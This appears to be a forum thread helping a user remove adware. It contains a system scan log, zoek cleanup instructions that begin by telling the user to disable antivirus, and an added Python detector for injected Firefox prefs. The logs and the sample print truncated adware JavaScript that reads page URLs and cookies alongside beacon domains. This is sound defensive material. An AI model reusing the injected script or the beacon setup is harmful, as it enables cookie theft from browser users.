2014-07-29 16:23:23 7275A3A5995C1DDBCF2441E5DDB59428 3795984 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005e37\DAO.18736091.exe

2014-07-28 16:22:51 B75CB32A17945081C64C1ED8A6B54A44 393672 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005d99\updatus.18732029_RUNASUSER.exe

2014-07-27 07:06:28 11FD8DDAB6014EECCE88F1F581604C30 1120256 ----a-w- C:\Windows\System32\SkyDrive.exe

2014-07-25 16:20:38 0B7094462A70E630ECAA8E1DEE603988 3769784 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005d8b\DAO.18726867.exe

2014-07-24 16:18:57 84B27D2B862C24CCDDA27DFFFD6E580F 393560 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005d84\updatus.18722395_RUNASUSER.exe

2014-07-24 01:37:41 82201563BC06E78EC4F713DA439EC257 560640 ----a-w- C:\Program Files (x86)\Steam\SteamApps\common\Dragon's Lair\DragonsLair.exe

2014-07-23 16:17:59 A29D17CDEB67522D6822C45153EB79B3 3766008 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005d75\DAO.18716353.exe

2014-07-23 16:17:57 38B68BC6D0B5CE3937FF36A47B402F6F 393048 ----a-w- C:\Users\Owner\AppData\Local\NVIDIA\NvBackend\Packages\00005d73\updatus.18718861_RUNASUSER.exe

=== C: other files ==

 

==== Startup Registry Enabled ======================

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"ASUS AiChargerPlus Execute"="C:\Program Files (x86)\InstallShield Installation Information\{E6931688-DA2B-4E16-8539-3D323D69C677}\AiChargerPlus.exe"

"ASUSWebStorage"="C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSPanel.exe /S"

"ASUSPRP"="C:\Program Files (x86)\ASUS\APRP\APRP.EXE"

"StartCCC"="C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe MSRun"

"RemoteControl10"="C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"

"WRSVC"="C:\Program Files (x86)\Webroot\WRSA.exe -ul"

"Adobe ARM"="C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

"iSkysoft Helper Compact.exe"="C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe"

"DelaypluginInstall"="C:\ProgramData\iSkysoft\iTube Studio\DelayPluginI.exe"

"SunJavaUpdateSched"="C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

 

==== Startup Registry Enabled x64 ======================

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"lxecmon.exe"="C:\Program Files (x86)\Lexmark Pro800-Pro900 Series\lxecmon.exe"

"EzPrint"="C:\Program Files (x86)\Lexmark Pro800-Pro900 Series\ezprint.exe"

"NvBackend"="C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"

"ShadowPlay"="C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart"

"Classic Start Menu"="C:\Program Files\Classic Shell\ClassicStartMenu.exe -autorun"

"XboxStat"="C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe silentrun"

"RTHDVCPL"="C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s"

"RtHDVBg"="C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /MAXX4 "

"EvtMgr6"="C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming"

 

==== Startup Folders ======================

 

2014-03-11 20:12:58 10720 ----a-w- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DesktopOK.ini

2010-09-13 01:33:26 316416 ----a-w- C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DesktopOK_x64.exe

2014-04-13 14:57:54 2129 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass FF RunOnce.lnk

2014-04-13 14:57:54 2129 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk

2014-02-06 02:27:34 2211 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install Webroot FF RunOnce.lnk

2014-02-06 02:27:33 2211 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install Webroot IE RunOnce.lnk

2014-04-15 01:17:13 924 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA3100 Genie.lnk

2014-02-08 23:48:29 1129 ----a-w- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Secunia PSI Tray.lnk

 

==== Task Scheduler Jobs ======================

 

C:\WINDOWS\tasks\Adobe Flash Player Updater.job --a-------- C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [07/08/2014 11:29 AM]

C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job --a-------- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe []

C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job --a-------- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe []

 

==== Other Scheduled Tasks ======================

 

"C:\WINDOWS\SysNative\tasks\Adobe Flash Player Updater" [C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]

"C:\WINDOWS\SysNative\tasks\AsusVibeSchedule" ["C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe"]

"C:\WINDOWS\SysNative\tasks\CCleanerSkipUAC" ["C:\Program Files\CCleaner\CCleaner.exe"]

"C:\WINDOWS\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]

"C:\WINDOWS\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]

"C:\WINDOWS\SysNative\tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-610162119-960651099-2309175161-1001" [C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe]

"C:\WINDOWS\SysNative\tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-610162119-960651099-2309175161-1001" [C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe]

"C:\WINDOWS\SysNative\tasks\ASUS\ASUS AI Suite II Execute" [C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe]

"C:\WINDOWS\SysNative\tasks\ASUS\ASUS Easy Update 2" [C:\Program Files (x86)\ASUS\ASUS Easy Update\ALU.exe]

 

==== Firefox Extensions Registry ======================

 

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]

"{F003DA68-8256-4b37-A6C4-350FA04494DF}"="C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt" [07/17/2014 11:31 AM]

 

==== Firefox Extensions ======================

 

ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default

- Webroot Filtering Extension - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer

- Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt

- Ant Video Downloader - %ProfilePath%\extensions\anttoolbar@ant.com

- LastPass - %ProfilePath%\extensions\support@lastpass.com

- DownloadHelper - %ProfilePath%\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}

- Video Downloader Professional - %ProfilePath%\extensions\ffext_basicvideoext@startpage24.xpi

- TinEye Reverse Image Search - %ProfilePath%\extensions\tineye@ideeinc.com.xpi

- AVG PrivacyFix - %ProfilePath%\extensions\{7CA9CF31-1C73-46CD-8377-85AB71EA771F}.xpi

- Adblock Plus - %ProfilePath%\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi

 

AppDir: C:\Program Files (x86)\Mozilla Firefox

- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

 

==== Firefox Plugins ======================

 

Profilepath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default

4390CCD3790F8D9C427C0C29590C62D7 - C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll - Shockwave Flash

18CF51689186AEB9D1D149AEB0E92D03 - C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL - Microsoft Office 2013

 

 

==== Chrome Look ======================

 

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions

bhicbhhgmeobmgjehpcecbkjpehljipn - C:\ProgramData\iSkysoft\iTube Studio\ISAllmytube@iSkysoft.com.crx[]

bpegkgagfojjbcpkihigfmkojdmmimdf - C:\Program Files (x86)\Freemake\Freemake Video Downloader\BrowserPlugin\Chrome\Freemake.Plugin.Chrome.crx[]

ehgldbbpchgpcfagfpfjgoomddhccfgh - C:\Program Files (x86)\Freemake\Freemake Video Downloader\BrowserPlugin\Chrome\ChromeYoutubePlugin.crx[]

jbolfgndggfhhpbnkgnpjkfhinclbigj - No path found[]

kjeghcllfecehndceplomkocgfbklffd - C:\ProgramData\WRData\PKG\CHROME\CHROME_1.0.0.26.crx[02/05/2014 08:26 PM]

okfhiodnpcnnnpgbjbhfebjnbagmfhab - C:\ProgramData\WRData\pkg\lpchrome.crx[02/05/2014 08:27 PM]

 

PorIcEChop - Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

Google Voice Search Hotword (Beta) - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn

Last updated at time on date - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb

Lamborghini Sesto Elemento Theme - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\dappigdjllcnkkoacaoolciaolaaiemb

PartyCloud DJ - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\defekohaofmambflfpfoojkmfdpcbgko

Gmail Offline - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejidjjhkpiempkbhmpbfngldlkglhimk

Pandora - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl

Free Music Downloads - Mp3 Music - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fgbljhhdencbpamajdkebnaaefgllghj

AdBlock - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom

TinEye Reverse Image Search - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\haebnnbpedcbhciplfhjjkbafijpncjl

LastPass - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd

SavuEMass - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

Webroot Filtering Extension - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjeghcllfecehndceplomkocgfbklffd

Until AM Web App - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\kodigjkcpaoeodlnmcnekemakpnmegnk

Google Wallet - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda

Webroot Password Manager - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okfhiodnpcnnnpgbjbhfebjnbagmfhab

Gmail - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

AVG PrivacyFix - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmejhjjecaldkllonlokhkglbdbkdcni

App Launcher Customizer for Google™ - Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ponjkmladgjfjgllmhnkhgbgocdigcjm

PorIcEChop - Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Owner\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Owner\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

 

==== IE Start and Search Settings ======================

 

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]

"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}] not found

 

==== C:\zoek_backup content ======================

 

C:\zoek_backup (files=0 folders=0 0 bytes)

 

==== EOF on Tue 07/29/2014 at 14:22:36.36 ======================


Scan with ZOEK

Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

  • Right-click on the zoek.exe icon and select Run as Administrator to start the tool.
  • Wait patiently until the main console will appear, it may take a minute or two.
  • In the main box please paste in the following script:
    createsrpoint;autoclean;emptyalltemp;C:\ProgramData\GreenBay App;fsC:\ProgramData\SavuEMass;fsC:\ProgramData\e646da9e30087882;fsbhicbhhgmeobmgjehpcecbkjpehljipn;chrapdkcimmhjninckhlbphakaiolngmjfj;chrjdjjicajhkckggokiccknagdncidjcee;chr

  • Make sure that Scan All Users option is checked.
  • Push Run Script and wait patiently. The scan may take a couple of minutes.
  • When the scan completes, a zoek-results logfile should open in notepad.
  • If a reboot is needed, it will be opened after it. You may also find it at your main drive (usually C:\ drive)



Post its content into your next reply.

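The zoek run requested above also touches the Firefox profile: in the results log further down, its FireFox Fix section strips user_pref lines from prefs.js under two randomly named branches, extensions.gpHtKO and extensions.x9pj1QzJyQZs, each holding a .scode value whose content is JavaScript that reads window.self.location.href together with document.cookie, an .epoch timestamp and a .url pointing at a /sync2/ endpoint. Preferences are configuration, not a place for script, so a string value shaped like a function body is a reliable indicator on its own. The Python below is an added example, not part of the thread or of zoek: it parses prefs.js, groups prefs by extensions.<branch>, reports branches carrying inline script (with any beacon URL and epoch found alongside) and returns the file with those lines stripped, which is the end state zoek's log records. `SAMPLE_PREFS` is constructed to mirror those two branches; the log truncates the payloads and query strings, so the script body and the q= value here are stand-ins.

```python
"""Spot adware-injected preference branches in a Firefox prefs.js.

Added example, not part of the thread or of zoek. prefs.js holds one
user_pref("name", value); per line; add-on settings live under
extensions.<branch>.<key>. The sample below is constructed.
"""
import re
from collections import defaultdict

PREF_RE = re.compile(r'^\s*user_pref\("([^"]+)",\s*(.+)\);\s*$')
# Markers of an inline script payload stored as a preference value.
SCRIPT_RE = re.compile(r"\(function\s*\(|document\.cookie|location\.href")
URL_RE = re.compile(r"^https?://", re.I)

# Constructed prefs.js: two benign entries plus the shape of the two branches from the log.
SAMPLE_PREFS = r'''# Mozilla User Preferences
user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1406300000);
user_pref("browser.startup.homepage", "https://www.mozilla.org/");
user_pref("extensions.adblockplus.currentVersion", "2.6.3");
user_pref("extensions.gpHtKO.epoch", "1406354996");
user_pref("extensions.gpHtKO.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1){}}catch(e){}})();");
user_pref("extensions.gpHtKO.url", "http://terminalukusaa.us/sync2/?q=CONSTRUCTED");
user_pref("extensions.lastAppVersion", "31.0");
user_pref("extensions.x9pj1QzJyQZs.epoch", "1406354996");
user_pref("extensions.x9pj1QzJyQZs.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1){}}catch(e){}})();");
user_pref("extensions.x9pj1QzJyQZs.url", "http://jpisyncs.info/sync2/?q=CONSTRUCTED");
'''


def parse_value(raw: str):
    """Decode a prefs.js value: quoted string (undoing \\" and \\\\ escapes), boolean or integer."""
    raw = raw.strip()
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return re.sub(r"\\(.)", r"\1", raw[1:-1])
    if raw in ("true", "false"):
        return raw == "true"
    try:
        return int(raw)
    except ValueError:
        return raw


def parse_prefs(text: str) -> dict:
    """Return {pref_name: value} for every user_pref line; comments and junk are skipped."""
    prefs = {}
    for line in text.splitlines():
        m = PREF_RE.match(line)
        if m:
            prefs[m.group(1)] = parse_value(m.group(2))
    return prefs


def extension_branches(prefs: dict) -> dict:
    """Group extensions.<branch>.<key> prefs as {branch: {key: value}}."""
    branches = defaultdict(dict)
    for name, value in prefs.items():
        parts = name.split(".", 2)
        if len(parts) == 3 and parts[0] == "extensions":
            branches[parts[1]][parts[2]] = value
    return dict(branches)


def find_injected(prefs: dict) -> dict:
    """Flag branches that store JavaScript in a pref; report the URL and epoch stored beside it."""
    hits = {}
    for branch, keys in extension_branches(prefs).items():
        script_keys = [k for k, v in keys.items() if isinstance(v, str) and SCRIPT_RE.search(v)]
        if not script_keys:
            continue  # URLs alone are normal in add-on prefs; script is not
        urls = [v.split("?", 1)[0] for v in keys.values() if isinstance(v, str) and URL_RE.match(v)]
        hits[branch] = {"script_keys": script_keys, "urls": urls, "epoch": keys.get("epoch")}
    return hits


def strip_branches(text: str, branches):
    """Return (prefs.js text without the given branches, list of removed lines)."""
    prefixes = tuple(f'user_pref("extensions.{b}.' for b in branches)
    kept, removed = [], []
    for line in text.splitlines():
        (removed if line.lstrip().startswith(prefixes) else kept).append(line)
    return "\n".join(kept) + "\n", removed


if __name__ == "__main__":
    found = find_injected(parse_prefs(SAMPLE_PREFS))
    for branch, info in found.items():
        print(f"extensions.{branch}: script in {info['script_keys']}, beacon {info['urls']}, epoch {info['epoch']}")
    _, gone = strip_branches(SAMPLE_PREFS, found)
    print(f"{len(gone)} lines would be removed")
```

Write the stripped text back only with Firefox closed and after copying prefs.js aside: Firefox rewrites prefs.js from memory on exit, so edits made while it is running are lost, and the copy lets you compare against what zoek reports.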

 

Zoek.exe v5.0.0.0 Updated 29-07-2014

Tool run by Owner on Tue 07/29/2014 at 19:36:21.91.

Microsoft Windows 8.1 6.3.9600  x64

Running in: Normal Mode Internet Access Detected

Launched: C:\Users\Owner\Desktop\zoek.exe [scan all users] [script inserted] 

 

==== Older Logs ======================

 

C:\zoek-results2014-07-29-202236.log 34852 bytes

 

==== System Restore Info ======================

 

7/29/2014 7:36:43 PM Zoek.exe System Restore Point Created Succesfully.

 

==== Deleting CLSID Registry Keys ======================

 

 

==== Deleting CLSID Registry Values ======================

 

 

==== Deleting Services ======================

 

 

==== FireFox Fix ======================

 

ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default

 

user.js not found

---- Lines easylife removed from prefs.js ----

user_pref("extensions.gpHtKO.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexO

user_pref("extensions.x9pj1QzJyQZs.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.

---- Lines extensions.gpHtKO removed from prefs.js ----

user_pref("extensions.gpHtKO.epoch", "1406354996");

user_pref("extensions.gpHtKO.url", "http://terminalukusaa.us/sync2/?q=hfZ9ofqJC75MCyVUojsFrjwMg708BNmGWj8lkGhGheDUojw9rdCGrjsEqjY8rGhIC7n0rjnEqHs8rdgE

---- Lines extensions.x9pj1QzJyQZs removed from prefs.js ----

user_pref("extensions.x9pj1QzJyQZs.epoch", "1406354996");

user_pref("extensions.x9pj1QzJyQZs.url", "http://jpisyncs.info/sync2/?q=hfZ9ofbTCyrMCyVUojsFrjwMg708BNmGWj8lkGhGheDUojw9rdCGrjsEqjUEpihIC7n0rjnEqHs8rd

---- FireFox user.js and prefs.js backups ---- 

 

prefs_20140729_0742_.backup

 

==== Deleting Files \ Folders ======================

 

C:\ProgramData\GreenBay App not found

C:\ProgramData\SavuEMass not found

C:\ProgramData\e646da9e30087882 not found

C:\Users\Owner\AppData\LocalLow\{26D46134-E7D9-B0E1-D3AC-35CE315423DC} deleted

C:\Users\Owner\AppData\LocalLow\{C9EAD628-4A64-6AB3-116E-04E63EF48DFE} deleted

C:\Users\Owner\AppData\Local\Packages\windows_ie_ac_001\AC\{26D46134-E7D9-B0E1-D3AC-35CE315423DC} deleted

C:\Users\Owner\AppData\Local\Packages\windows_ie_ac_001\AC\{C9EAD628-4A64-6AB3-116E-04E63EF48DFE} deleted

C:\PROGRA~3\SavuEMass deleted

C:\PROGRA~2\SavuEMass deleted

C:\PROGRA~2\Yahoo! deleted

C:\PROGRA~2\Orbitdownloader deleted

C:\Users\Owner\AppData\Roaming\MPUI.ini deleted

C:\Users\Owner\AppData\Roaming\Yahoo! deleted

C:\PROGRA~3\UpdaterLog.txt deleted

C:\PROGRA~3\Yahoo! deleted

C:\PROGRA~3\GreenBay App deleted

C:\PROGRA~3\InstallMate deleted

C:\PROGRA~3\Package Cache deleted

C:\Users\Owner\Searches deleted

C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default\jetpack deleted

"C:\PROGRA~3\e646da9e30087882\{B945F928-45A2-231E-495F-38C40CA198E9}.20140721150147" deleted

"C:\PROGRA~3\e646da9e30087882\{F7FFE175-E3D6-2E86-0226-1D3AE4905E40}.20140721150137" deleted

"C:\PROGRA~3\e646da9e30087882" deleted

"C:\Users\Owner\AppData\Roaming\GrabPro" deleted

"C:\Users\Owner\AppData\Roaming\Samsung" deleted

 

==== Firefox Extensions Registry ======================

 

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]

"{F003DA68-8256-4b37-A6C4-350FA04494DF}"="C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt" [07/17/2014 11:31 AM]

 

==== Firefox Extensions ======================

 

ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default

- Webroot Filtering Extension - C:\ProgramData\WRData\PKG\FIREFOX\WebrootSecure_SocketServer

- Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt

- Ant Video Downloader - %ProfilePath%\extensions\anttoolbar@ant.com

- LastPass - %ProfilePath%\extensions\support@lastpass.com

- DownloadHelper - %ProfilePath%\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}

- Video Downloader Professional - %ProfilePath%\extensions\ffext_basicvideoext@startpage24.xpi

- TinEye Reverse Image Search - %ProfilePath%\extensions\tineye@ideeinc.com.xpi

- AVG PrivacyFix - %ProfilePath%\extensions\{7CA9CF31-1C73-46CD-8377-85AB71EA771F}.xpi

- Adblock Plus - %ProfilePath%\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi

 

AppDir: C:\Program Files (x86)\Mozilla Firefox

- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

 

==== Firefox Plugins ======================

 

Profilepath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\kfjgpmg8.default

4390CCD3790F8D9C427C0C29590C62D7 - C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll - Shockwave Flash

18CF51689186AEB9D1D149AEB0E92D03 - C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL - Microsoft Office 2013

 

 

==== Chrome Look ======================

 

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions

bhicbhhgmeobmgjehpcecbkjpehljipn - C:\ProgramData\iSkysoft\iTube Studio\ISAllmytube@iSkysoft.com.crx[]

bpegkgagfojjbcpkihigfmkojdmmimdf - C:\Program Files (x86)\Freemake\Freemake Video Downloader\BrowserPlugin\Chrome\Freemake.Plugin.Chrome.crx[]

ehgldbbpchgpcfagfpfjgoomddhccfgh - C:\Program Files (x86)\Freemake\Freemake Video Downloader\BrowserPlugin\Chrome\ChromeYoutubePlugin.crx[]

jbolfgndggfhhpbnkgnpjkfhinclbigj - No path found[]

kjeghcllfecehndceplomkocgfbklffd - C:\ProgramData\WRData\PKG\CHROME\CHROME_1.0.0.26.crx[02/05/2014 08:26 PM]

okfhiodnpcnnnpgbjbhfebjnbagmfhab - C:\ProgramData\WRData\pkg\lpchrome.crx[02/05/2014 08:27 PM]

 

PorIcEChop - Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Administrator\AppData\Local\Torch\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Administrator\AppData\Local\Torch\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Chromatic Browser\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

SavuEMass - Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdjjicajhkckggokiccknagdncidjcee

PorIcEChop - Guest\AppData\Local\Google\Chrome SxS\User Data\Default\Extensions\apdkcimmhjninckhlbphakaiolngmjfj

